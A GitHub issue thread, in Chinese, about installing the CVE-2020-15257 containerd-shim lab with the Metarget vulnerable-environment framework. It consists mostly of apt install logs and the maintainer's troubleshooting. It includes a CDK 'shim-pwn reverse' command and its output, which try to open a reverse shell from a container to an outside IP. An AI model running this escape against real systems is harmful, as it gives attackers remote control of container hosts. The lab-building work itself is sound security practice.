search

Metarget / metarget

Metarget is a framework providing automatic constructions of vulnerable infrastructures.
Apache License 2.0
1.06k stars 165 forks source link

配置cve-2020-15257的小问题 #74

Closed duowen1 closed 3 years ago

duowen1 commented 3 years ago

在Ubuntu18.04和16.04分别搭建过环境,最后结果都下面所示,Linux内核版本是5.8.0-59-generic

sudo ./metarget cnv install cve-2020-15257 --verbose
cve-2020-15257 is going to be installed
uninstalling current docker gadgets if applicable
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
The following packages will be REMOVED:
  docker-ce
0 upgraded, 0 newly installed, 1 to remove and 444 not upgraded.
After this operation, 181 MB disk space will be freed.
(Reading database ... 133309 files and directories currently installed.)
Removing docker-ce (18.03.1~ce~3-0~ubuntu) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'docker' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'docker-engine' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'docker.io' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'containerd' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'runc' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
installing prerequisites
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease          
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                  
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                   
Hit:5 http://archive.ubuntu.com/ubuntu xenial-updates InRelease                                               
Hit:6 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Hit:7 https://download.docker.com/linux/ubuntu bionic InRelease
Reading package lists... Done         
Reading package lists... Done
Building dependency tree       
Reading state information... Done
ca-certificates is already the newest version (20210119~18.04.1).
software-properties-common is already the newest version (0.96.24.32.14).
apt-transport-https is already the newest version (1.6.13).
gnupg-agent is already the newest version (2.2.4-1ubuntu1.4).
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
adding apt repository deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable
OK
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                     
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                   
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
adding apt repository deb http://archive.ubuntu.com/ubuntu xenial-updates universe
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                               
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                             
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
adding apt repository deb http://archive.ubuntu.com/ubuntu bionic-updates universe
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                     
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                                             
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                                               
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                                             
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
installing docker-ce with 18.03.1~ce~3-0~ubuntu version
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  docker-ce
0 upgraded, 1 newly installed, 0 to remove and 444 not upgraded.
Need to get 0 B/33.9 MB of archives.
After this operation, 181 MB of additional disk space will be used.
Selecting previously unselected package docker-ce.
(Reading database ... 133095 files and directories currently installed.)
Preparing to unpack .../docker-ce_18.03.1~ce~3-0~ubuntu_amd64.deb ...
Unpacking docker-ce (18.03.1~ce~3-0~ubuntu) ...
Setting up docker-ce (18.03.1~ce~3-0~ubuntu) ...
Processing triggers for ureadahead (0.100.0-21) ...
Processing triggers for systemd (237-3ubuntu10.24) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
warning: no candidate version for containerd
warning: docker seems to be installed, but some errors happened during installation
cve-2020-15257 successfully installed

安装成功,但是显示有warning

然后按照Writeup的方式去复现,可以找到抽象命名空间的套接字。但是在进行exploit时发现结果如下所示:

root@ubuntu:/tmp# run shim-pwn reverse xx.xx.xx.xx 1234
bash: run: command not found
root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
2021/06/28 07:55:31 tring to spawn shell to 49.232.1.8:1234
2021/06/28 07:55:31 try socket: @/containerd-shim/moby/b2d38375588b3b988f9010ce551d785a2bdb37a497aed068c8482b0776af2910/shim.sock
2021/06/28 07:55:31 rpc error response.:
rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
2021/06/28 07:55:31 exploit failed.

报错信息显示runc不在PATH路径下,执行runc提示需要安装。发现实际上安装的runc可执行文件为docker-runc,创建软链接后利用成功。

似乎如果系统安装过docker,再利用metarget安装漏洞环境就会导致runc的名称问题。不知道这属不属于bug,或许在writeup上可以做下标注?

brant-ruan commented 3 years ago

在Ubuntu18.04和16.04分别搭建过环境,最后结果都下面所示,Linux内核版本是5.8.0-59-generic

sudo ./metarget cnv install cve-2020-15257 --verbose
cve-2020-15257 is going to be installed
uninstalling current docker gadgets if applicable
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
The following packages will be REMOVED:
  docker-ce
0 upgraded, 0 newly installed, 1 to remove and 444 not upgraded.
After this operation, 181 MB disk space will be freed.
(Reading database ... 133309 files and directories currently installed.)
Removing docker-ce (18.03.1~ce~3-0~ubuntu) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'docker' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'docker-engine' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'docker.io' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'containerd' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package 'runc' is not installed, so not removed
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
installing prerequisites
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease          
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                  
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                   
Hit:5 http://archive.ubuntu.com/ubuntu xenial-updates InRelease                                               
Hit:6 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Hit:7 https://download.docker.com/linux/ubuntu bionic InRelease
Reading package lists... Done         
Reading package lists... Done
Building dependency tree       
Reading state information... Done
ca-certificates is already the newest version (20210119~18.04.1).
software-properties-common is already the newest version (0.96.24.32.14).
apt-transport-https is already the newest version (1.6.13).
gnupg-agent is already the newest version (2.2.4-1ubuntu1.4).
The following packages were automatically installed and are no longer required:
  aufs-tools cgroupfs-mount pigz
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
adding apt repository deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable
OK
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                     
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                   
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
adding apt repository deb http://archive.ubuntu.com/ubuntu xenial-updates universe
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                               
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                             
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
adding apt repository deb http://archive.ubuntu.com/ubuntu bionic-updates universe
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                     
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                                             
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                                               
Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                                             
Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
Reading package lists... Done
installing docker-ce with 18.03.1~ce~3-0~ubuntu version
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  docker-ce
0 upgraded, 1 newly installed, 0 to remove and 444 not upgraded.
Need to get 0 B/33.9 MB of archives.
After this operation, 181 MB of additional disk space will be used.
Selecting previously unselected package docker-ce.
(Reading database ... 133095 files and directories currently installed.)
Preparing to unpack .../docker-ce_18.03.1~ce~3-0~ubuntu_amd64.deb ...
Unpacking docker-ce (18.03.1~ce~3-0~ubuntu) ...
Setting up docker-ce (18.03.1~ce~3-0~ubuntu) ...
Processing triggers for ureadahead (0.100.0-21) ...
Processing triggers for systemd (237-3ubuntu10.24) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
warning: no candidate version for containerd
warning: docker seems to be installed, but some errors happened during installation
cve-2020-15257 successfully installed

安装成功,但是显示有warning

然后按照Writeup的方式去复现,可以找到抽象命名空间的套接字。但是在进行exploit时发现结果如下所示:

root@ubuntu:/tmp# run shim-pwn reverse xx.xx.xx.xx 1234
bash: run: command not found
root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
2021/06/28 07:55:31 tring to spawn shell to 49.232.1.8:1234
2021/06/28 07:55:31 try socket: @/containerd-shim/moby/b2d38375588b3b988f9010ce551d785a2bdb37a497aed068c8482b0776af2910/shim.sock
2021/06/28 07:55:31 rpc error response.:
rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
2021/06/28 07:55:31 exploit failed.

报错信息显示runc不在PATH路径下,执行runc提示需要安装。发现实际上安装的runc可执行文件为docker-runc,创建软链接后利用成功。

似乎如果系统安装过docker,再利用metarget安装漏洞环境就会导致runc的名称问题。不知道这属不属于bug,或许在writeup上可以做下标注?

  1. containerd安装失败这个可以复现,目前采用的是apt-get的方式安装containerd,16.04和18.04的containerd版本改变了,和之前cnv里定义的不一样,所以安装失败。后面打算看看有没有更好的方式去安装containerd,比如通过范围去安装、像“切换内核”部分一样提供多个安装方法等。
  2. runc和docker-runc的问题,这个可能和不同的软件包版本、系统版本有关?尚未搜到这两个的详细区别资料,但我之前用的更多的是docker-runc,也就是安装docker后自带的一系列docker-开头的程序(其实后面你能利用成功,也是因为docker-ce自动安装了docker-containerd,毕竟Metarget安装containerd失败了)。
  3. 一般的调用顺序是:docker daemon -> containerd -> runc(或docker-runc),在Metarget安装漏洞完成后,虽然containerd安装失败,但是docker能够正常使用,说明docker是能够找到docker-runc的,因此我觉得利用失败可能是exploit时调用外界runc,如果能够修改为docker-runc,应该可以成功。
  4. 我再确认下,再更新writeup。
brant-ruan commented 3 years ago

@duowen1 关于runc和docker-runc的问题,经测试在contrainerd安装成功(cnv install cve-2020-15257)后,runc、docker-runc均存在,路径分别为/usr/sbin/runc和/usr/bin/docker-runc,我这边用CDK去测试反弹shell是没有问题的。

brant-ruan commented 3 years ago

This issue will be closed. However the installation problem of containerd has not been solved perfectly yet. If necessary, someone may reopen this issue and we will talk and figure out how to solve it :p